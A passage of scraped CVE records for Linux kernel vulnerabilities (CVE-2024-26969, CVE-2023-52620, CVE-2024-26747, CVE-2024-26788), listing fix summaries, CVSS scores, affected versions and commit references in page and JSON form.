          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: qcom: gcc-ipq8074: fix terminating of frequency table arrays\n\nThe frequency table arrays are supposed to be terminated with an\nempty element. Add such entry to the end of the arrays where it\nis missing in order to avoid possible out-of-bound access when\nthe table is traversed by functions like qcom_find_freq() or\nqcom_find_freq_floor().\n\nOnly compile tested."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:05.215Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e117c6e2d1617520f5f7d7f6f6b395f01d8b5a27"
        },
        {
          "url": "https://git.kernel.org/stable/c/83fe1bbd9e259ad109827ccfbfc2488e0dea8e94"
        },
        {
          "url": "https://git.kernel.org/stable/c/851cc19bdb02556fb13629b3e4fef6f2bdb038fe"
        },
        {
          "url": "https://git.kernel.org/stable/c/9de184d4e557d550fb0b7b833b676bda4f269e4f"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd92b159c506804ac57adf3742d9728298bb1255"
        },
        {
          "url": "https://git.kernel.org/stable/c/b6b31b4c67ea6bd9222e5b73b330554c57f2f90d"
        },
        {
          "url": "https://git.kernel.org/stable/c/fc3ac2fcd0a7fad63eba1b359490a4b81720d0f9"
        },
        {
          "url": "https://git.kernel.org/stable/c/be9e2752d823eca1d5af67014a1844a9176ff566"
        },
        {
          "url": "https://git.kernel.org/stable/c/1040ef5ed95d6fd2628bad387d78a61633e09429"
        }
      ],
      "title": "clk: qcom: gcc-ipq8074: fix terminating of frequency table arrays",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26969",
    "datePublished": "2024-05-01T05:19:50.580Z",
    "dateReserved": "2024-02-19T14:20:24.202Z",
    "dateUpdated": "2025-05-04T09:01:05.215Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2023-52620 (GCVE-0-2023-52620)

Vulnerability from cvelistv5 – Published: 2024-03-21 10:43 – Updated: 2026-01-05 10:16

Title

netfilter: nf_tables: disallow timeout for anonymous sets

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: disallow timeout for anonymous sets Never used from userspace, disallow these parameters.

Severity ?

2.5 (Low)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/116b0e8e4673a5faa…
	https://git.kernel.org/stable/c/49ce99ae43314d887…
	https://git.kernel.org/stable/c/6f3ae02bbb62f151b…
	https://git.kernel.org/stable/c/00b19ee0dcc1aef06…
	https://git.kernel.org/stable/c/b7be6c737a179a769…
	https://git.kernel.org/stable/c/e26d3009efda338f1…

Impacted products

Vendor

Product

Version

Linux

Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < 116b0e8e4673a5faa8a739a19b467010c4d3058c (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < 49ce99ae43314d887153e07cec8bb6a647a19268 (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < 6f3ae02bbb62f151b19162d5fdc9fe3d48450323 (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < 00b19ee0dcc1aef06294471ab489bae26d94524e (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < b7be6c737a179a76901c872f6b4c1d00552d9a1b (git)
Affected: 761da2935d6e18d178582dbdf315a3a458555505 , < e26d3009efda338f19016df4175f354a9bd0a4ab (git)

Linux

Affected: 4.1
Unaffected: 0 , < 4.1 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.4 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "LOW",
              "baseScore": 2.5,
              "baseSeverity": "LOW",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2023-52620",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-26T20:33:31.634112Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T20:01:21.818Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:03:21.362Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/116b0e8e4673a5faa8a739a19b467010c4d3058c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/49ce99ae43314d887153e07cec8bb6a647a19268"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6f3ae02bbb62f151b19162d5fdc9fe3d48450323"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/00b19ee0dcc1aef06294471ab489bae26d94524e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7be6c737a179a76901c872f6b4c1d00552d9a1b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e26d3009efda338f19016df4175f354a9bd0a4ab"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "116b0e8e4673a5faa8a739a19b467010c4d3058c",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "49ce99ae43314d887153e07cec8bb6a647a19268",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "6f3ae02bbb62f151b19162d5fdc9fe3d48450323",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "00b19ee0dcc1aef06294471ab489bae26d94524e",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "b7be6c737a179a76901c872f6b4c1d00552d9a1b",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "e26d3009efda338f19016df4175f354a9bd0a4ab",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.1"
            },
            {
              "lessThan": "4.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.4",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.4",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: disallow timeout for anonymous sets\n\nNever used from userspace, disallow these parameters."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:16:43.186Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/116b0e8e4673a5faa8a739a19b467010c4d3058c"
        },
        {
          "url": "https://git.kernel.org/stable/c/49ce99ae43314d887153e07cec8bb6a647a19268"
        },
        {
          "url": "https://git.kernel.org/stable/c/6f3ae02bbb62f151b19162d5fdc9fe3d48450323"
        },
        {
          "url": "https://git.kernel.org/stable/c/00b19ee0dcc1aef06294471ab489bae26d94524e"
        },
        {
          "url": "https://git.kernel.org/stable/c/b7be6c737a179a76901c872f6b4c1d00552d9a1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/e26d3009efda338f19016df4175f354a9bd0a4ab"
        }
      ],
      "title": "netfilter: nf_tables: disallow timeout for anonymous sets",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52620",
    "datePublished": "2024-03-21T10:43:42.854Z",
    "dateReserved": "2024-03-06T09:52:12.090Z",
    "dateUpdated": "2026-01-05T10:16:43.186Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26747 (GCVE-0-2024-26747)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:00 – Updated: 2025-05-07 19:59

Title

usb: roles: fix NULL pointer issue when put module's reference

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: roles: fix NULL pointer issue when put module's reference In current design, usb role class driver will get usb_role_switch parent's module reference after the user get usb_role_switch device and put the reference after the user put the usb_role_switch device. However, the parent device of usb_role_switch may be removed before the user put the usb_role_switch. If so, then, NULL pointer issue will be met when the user put the parent module's reference. This will save the module pointer in structure of usb_role_switch. Then, we don't need to find module by iterating long relations.

Severity ?

4.4 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e279bf8e51893e1fe…
	https://git.kernel.org/stable/c/ef982fc41055fcebb…
	https://git.kernel.org/stable/c/0158216805ca7e498…
	https://git.kernel.org/stable/c/4b45829440b1b2089…
	https://git.kernel.org/stable/c/01f82de440f2ab07c…
	https://git.kernel.org/stable/c/1c9be13846c0b2abc…

Impacted products

Vendor

Product

Version

Linux

Affected: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b , < e279bf8e51893e1fe160b3d8126ef2dd00f661e1 (git)
Affected: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b , < ef982fc41055fcebb361a92288d3225783d12913 (git)
Affected: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b , < 0158216805ca7e498d07de38840d2732166ae5fa (git)
Affected: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b , < 4b45829440b1b208948b39cc71f77a37a2536734 (git)
Affected: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b , < 01f82de440f2ab07c259b7573371e1c42e5565db (git)
Affected: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b , < 1c9be13846c0b2abc2480602f8ef421360e1ad9e (git)
Affected: 7b169e33a3bc9040e06988b2bc15e83d2af80358 (git)

Linux

Affected: 4.19
Unaffected: 0 , < 4.19 (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 4.4,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "HIGH",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26747",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-07T19:59:47.248619Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-07T19:59:49.971Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.305Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e279bf8e51893e1fe160b3d8126ef2dd00f661e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ef982fc41055fcebb361a92288d3225783d12913"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0158216805ca7e498d07de38840d2732166ae5fa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4b45829440b1b208948b39cc71f77a37a2536734"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/01f82de440f2ab07c259b7573371e1c42e5565db"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1c9be13846c0b2abc2480602f8ef421360e1ad9e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/roles/class.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e279bf8e51893e1fe160b3d8126ef2dd00f661e1",
              "status": "affected",
              "version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
              "versionType": "git"
            },
            {
              "lessThan": "ef982fc41055fcebb361a92288d3225783d12913",
              "status": "affected",
              "version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
              "versionType": "git"
            },
            {
              "lessThan": "0158216805ca7e498d07de38840d2732166ae5fa",
              "status": "affected",
              "version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
              "versionType": "git"
            },
            {
              "lessThan": "4b45829440b1b208948b39cc71f77a37a2536734",
              "status": "affected",
              "version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
              "versionType": "git"
            },
            {
              "lessThan": "01f82de440f2ab07c259b7573371e1c42e5565db",
              "status": "affected",
              "version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
              "versionType": "git"
            },
            {
              "lessThan": "1c9be13846c0b2abc2480602f8ef421360e1ad9e",
              "status": "affected",
              "version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "7b169e33a3bc9040e06988b2bc15e83d2af80358",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/roles/class.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.19"
            },
            {
              "lessThan": "4.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.18.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: roles: fix NULL pointer issue when put module\u0027s reference\n\nIn current design, usb role class driver will get usb_role_switch parent\u0027s\nmodule reference after the user get usb_role_switch device and put the\nreference after the user put the usb_role_switch device. However, the\nparent device of usb_role_switch may be removed before the user put the\nusb_role_switch. If so, then, NULL pointer issue will be met when the user\nput the parent module\u0027s reference.\n\nThis will save the module pointer in structure of usb_role_switch. Then,\nwe don\u0027t need to find module by iterating long relations."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:54:39.831Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e279bf8e51893e1fe160b3d8126ef2dd00f661e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef982fc41055fcebb361a92288d3225783d12913"
        },
        {
          "url": "https://git.kernel.org/stable/c/0158216805ca7e498d07de38840d2732166ae5fa"
        },
        {
          "url": "https://git.kernel.org/stable/c/4b45829440b1b208948b39cc71f77a37a2536734"
        },
        {
          "url": "https://git.kernel.org/stable/c/01f82de440f2ab07c259b7573371e1c42e5565db"
        },
        {
          "url": "https://git.kernel.org/stable/c/1c9be13846c0b2abc2480602f8ef421360e1ad9e"
        }
      ],
      "title": "usb: roles: fix NULL pointer issue when put module\u0027s reference",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26747",
    "datePublished": "2024-04-03T17:00:34.066Z",
    "dateReserved": "2024-02-19T14:20:24.168Z",
    "dateUpdated": "2025-05-07T19:59:49.971Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26788 (GCVE-0-2024-26788)

Vulnerability from cvelistv5 – Published: 2024-04-04 08:20 – Updated: 2025-05-04 08:56

Title

dmaengine: fsl-qdma: init irq after reg initialization

Summary

In the Linux kernel, the following vulnerability has been resolved: dmaengine: fsl-qdma: init irq after reg initialization Initialize the qDMA irqs after the registers are configured so that interrupts that may have been pending from a primary kernel don't get processed by the irq handler before it is ready to and cause panic with the following trace: Call trace: fsl_qdma_queue_handler+0xf8/0x3e8 __handle_irq_event_percpu+0x78/0x2b0 handle_irq_event_percpu+0x1c/0x68 handle_irq_event+0x44/0x78 handle_fasteoi_irq+0xc8/0x178 generic_handle_irq+0x24/0x38 __handle_domain_irq+0x90/0x100 gic_handle_irq+0x5c/0xb8 el1_irq+0xb8/0x180 _raw_spin_unlock_irqrestore+0x14/0x40 __setup_irq+0x4bc/0x798 request_threaded_irq+0xd8/0x190 devm_request_threaded_irq+0x74/0xe8 fsl_qdma_probe+0x4d4/0xca8 platform_drv_probe+0x50/0xa0 really_probe+0xe0/0x3f8 driver_probe_device+0x64/0x130 device_driver_attach+0x6c/0x78 __driver_attach+0xbc/0x158 bus_for_each_dev+0x5c/0x98 driver_attach+0x20/0x28 bus_add_driver+0x158/0x220 driver_register+0x60/0x110 __platform_driver_register+0x44/0x50 fsl_qdma_driver_init+0x18/0x20 do_one_initcall+0x48/0x258 kernel_init_freeable+0x1a4/0x23c kernel_init+0x10/0xf8 ret_from_fork+0x10/0x18

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3cc5fb824c2125aa3…
	https://git.kernel.org/stable/c/9579a21e99fe8dab2…
	https://git.kernel.org/stable/c/4529c084a320be78f…
	https://git.kernel.org/stable/c/474d521da890b3e35…
	https://git.kernel.org/stable/c/a69c8bbb946936ac4…
	https://git.kernel.org/stable/c/677102a930643c31f…
	https://git.kernel.org/stable/c/87a39071e0b639f45…

Impacted products

Vendor

Product

Version

Linux

Affected: b092529e0aa09829a6404424ce167bf3ce3235e2 , < 3cc5fb824c2125aa3740d905b3e5b378c8a09478 (git)
Affected: b092529e0aa09829a6404424ce167bf3ce3235e2 , < 9579a21e99fe8dab22a253050ddff28d340d74e1 (git)
Affected: b092529e0aa09829a6404424ce167bf3ce3235e2 , < 4529c084a320be78ff2c5e64297ae998c6fdf66b (git)
Affected: b092529e0aa09829a6404424ce167bf3ce3235e2 , < 474d521da890b3e3585335fb80a6044cb2553d99 (git)
Affected: b092529e0aa09829a6404424ce167bf3ce3235e2 , < a69c8bbb946936ac4eb6a6ae1e849435aa8d947d (git)
Affected: b092529e0aa09829a6404424ce167bf3ce3235e2 , < 677102a930643c31f1b4c512b041407058bdfef8 (git)
Affected: b092529e0aa09829a6404424ce167bf3ce3235e2 , < 87a39071e0b639f45e05d296cc0538eef44ec0bd (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.271 , ≤ 5.4.* (semver)
Unaffected: 5.10.212 , ≤ 5.10.* (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.21 , ≤ 6.6.* (semver)
Unaffected: 6.7.9 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26788",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-04T15:30:20.690408Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:46.809Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.469Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3cc5fb824c2125aa3740d905b3e5b378c8a09478"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9579a21e99fe8dab22a253050ddff28d340d74e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4529c084a320be78ff2c5e64297ae998c6fdf66b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/474d521da890b3e3585335fb80a6044cb2553d99"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a69c8bbb946936ac4eb6a6ae1e849435aa8d947d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/677102a930643c31f1b4c512b041407058bdfef8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87a39071e0b639f45e05d296cc0538eef44ec0bd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma/fsl-qdma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3cc5fb824c2125aa3740d905b3e5b378c8a09478",
              "status": "affected",
              "version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
              "versionType": "git"
            },
            {
              "lessThan": "9579a21e99fe8dab22a253050ddff28d340d74e1",
              "status": "affected",
              "version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
              "versionType": "git"
            },
            {
              "lessThan": "4529c084a320be78ff2c5e64297ae998c6fdf66b",
              "status": "affected",
              "version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
              "versionType": "git"
            },
            {
              "lessThan": "474d521da890b3e3585335fb80a6044cb2553d99",
              "status": "affected",
              "version": "b092529e0aa09829a6404424ce167bf3ce3235e2",
              "versionType": "git"
            },
            {
